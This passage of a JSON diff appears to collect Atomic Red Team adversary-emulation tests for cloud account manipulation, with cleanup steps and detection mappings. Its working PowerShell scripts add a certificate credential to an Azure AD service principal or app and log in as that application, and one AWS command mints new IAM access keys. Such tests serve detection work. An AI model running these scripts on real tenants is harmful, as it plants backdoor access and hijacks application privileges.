Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"SuperSP\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\SuperSP.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\SuperSP.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"Passw0rd\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"$env:TEMP\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"$env:TEMP\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"SuperApp\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\SuperApp.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\SuperApp.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"Passw0rd\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"$env:TEMP\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"$env:TEMP\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + }, + { + "command": "aws iam create-access-key --user-name atomicredteam > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds\ncd $PathToAtomicsFolder/T1098.001/bin/\n./aws_secret.sh\n", + "source": "atomics/T1098.001/T1098.001.yaml", + "name": "Atomic Red Team Test - Account Manipulation: Additional Cloud Credentials" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1098.001", + "display_name": "Account Manipulation: Additional Cloud Credentials", + "atomic_tests": [ + { + "name": "Azure AD Application Hijacking - Service Principal", + "auto_generated_guid": "b8e747c3-bdf7-4d71-bce2-f1df2a057406", + "description": "Add a certificate to an Application through its Service Principal.\nThe certificate can then be used to authenticate as the application and benefit from its rights.\nAn account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "username": { + "description": "Azure AD username", + "type": "String", + "default": "jonh@contoso.com" + }, + "password": { + "description": "Azure AD password", + "type": "String", + "default": "p4sswd" + }, + "service_principal_name": { + "description": "Name of the targeted service principal", + "type": "String", + "default": "SuperSP" + }, + "certificate_password": { + "description": "Password of the new certificate", + "type": "String", + "default": "Passw0rd" + }, + "path_to_cert": { + "description": "Path of the new certificate, locally stored", + "type": "String", + "default": "$env:TEMP" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AzureAD module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{service_principal_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{service_principal_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "cleanup_command": "try {\nImport-Module -Name AzureAD -ErrorAction Ignore\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential -ErrorAction Ignore\n\n$sp = Get-AzureADServicePrincipal -Searchstring \"#{service_principal_name}\"\n$credz = Get-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId\nforeach ($cred in $credz) {\n if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq \"AtomicTest\") {\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\"\n} catch {}\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Azure AD Application Hijacking - App Registration", + "auto_generated_guid": "a12b5531-acab-4618-a470-0dafb294a87a", + "description": "Add a certificate to an Application through its App Registration.\nThe certificate can then be used to authenticate as the application and benefit from its rights.\nAn account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "username": { + "description": "Azure AD username", + "type": "String", + "default": "jonh@contoso.com" + }, + "password": { + "description": "Azure AD password", + "type": "String", + "default": "p4sswd" + }, + "application_name": { + "description": "Name of the targeted application", + "type": "String", + "default": "SuperApp" + }, + "certificate_password": { + "description": "Password of the new certificate", + "type": "String", + "default": "Passw0rd" + }, + "path_to_cert": { + "description": "Path of the new certificate, locally stored", + "type": "String", + "default": "$env:TEMP" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AzureAD module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\nif ($app -eq $null) { Write-Warning \"Application not found\"; exit }\n$certNotAfter = (Get-Date).AddDays(2)\n$credNotAfter = (Get-Date).AddDays(1)\n$thumb = (New-SelfSignedCertificate -DnsName \"atomicredteam.example.com\" -FriendlyName \"AtomicCert\" -CertStoreLocation \"cert:\\CurrentUser\\My\" -KeyExportPolicy Exportable -Provider \"Microsoft Enhanced RSA and AES Cryptographic Provider\" -NotAfter $certNotAfter).Thumbprint\n$pwd = ConvertTo-SecureString -String \"#{certificate_password}\" -Force -AsPlainText\nExport-PfxCertificate -cert \"cert:\\CurrentUser\\my\\$thumb\" -FilePath \"#{path_to_cert}\\#{application_name}.pfx\" -Password $pwd\n\n$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate(\"#{path_to_cert}\\#{application_name}.pfx\", $pwd)\n$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())\n\nNew-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier \"AtomicTest\" -Usage Verify -Value $keyValue -EndDate $credNotAfter\n\nStart-Sleep -s 30\n$tenant=Get-AzureADTenantDetail\n$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb\nWrite-Host \"Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)\"\nWrite-Host \"End of Hijacking\"\n", + "cleanup_command": "try {\nImport-Module -Name AzureAD -ErrorAction Ignore\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential -ErrorAction Ignore\n\n$app = Get-AzureADApplication -Searchstring \"#{application_name}\"\n$credz = Get-AzureADApplicationKeyCredential -ObjectId $app.ObjectId\nforeach ($cred in $credz) {\n if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier) -eq \"AtomicTest\") {\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\"\n} catch {}\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "AWS - Create Access Key and Secret Key", + "auto_generated_guid": "8822c3b0-d9f9-4daf-a043-491160a31122", + "description": "Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised\n", + "supported_platforms": [ + "iaas:aws" + ], + "input_arguments": { + "username": { + "description": "Create new AWS access and secret keys for the user", + "type": "String", + "default": "atomicredteam" + } + }, + "dependencies": [ + { + "description": "Check if the user exists.\n", + "prereq_command": "aws iam list-users | grep #{username}\n", + "get_prereq_command": "echo Please run atomic test T1136.003, before running this atomic\n" + } + ], + "executor": { + "command": "aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds\ncd $PathToAtomicsFolder/T1098.001/bin/\n./aws_secret.sh\n", + "cleanup_command": "access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`\naws iam delete-access-key --access-key-id $access_key --user-name #{username}\nrm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "requested modification of", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service principal" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "locked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "unlocked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "granted access to", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "removed access from", + "target_data_element": "user" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + 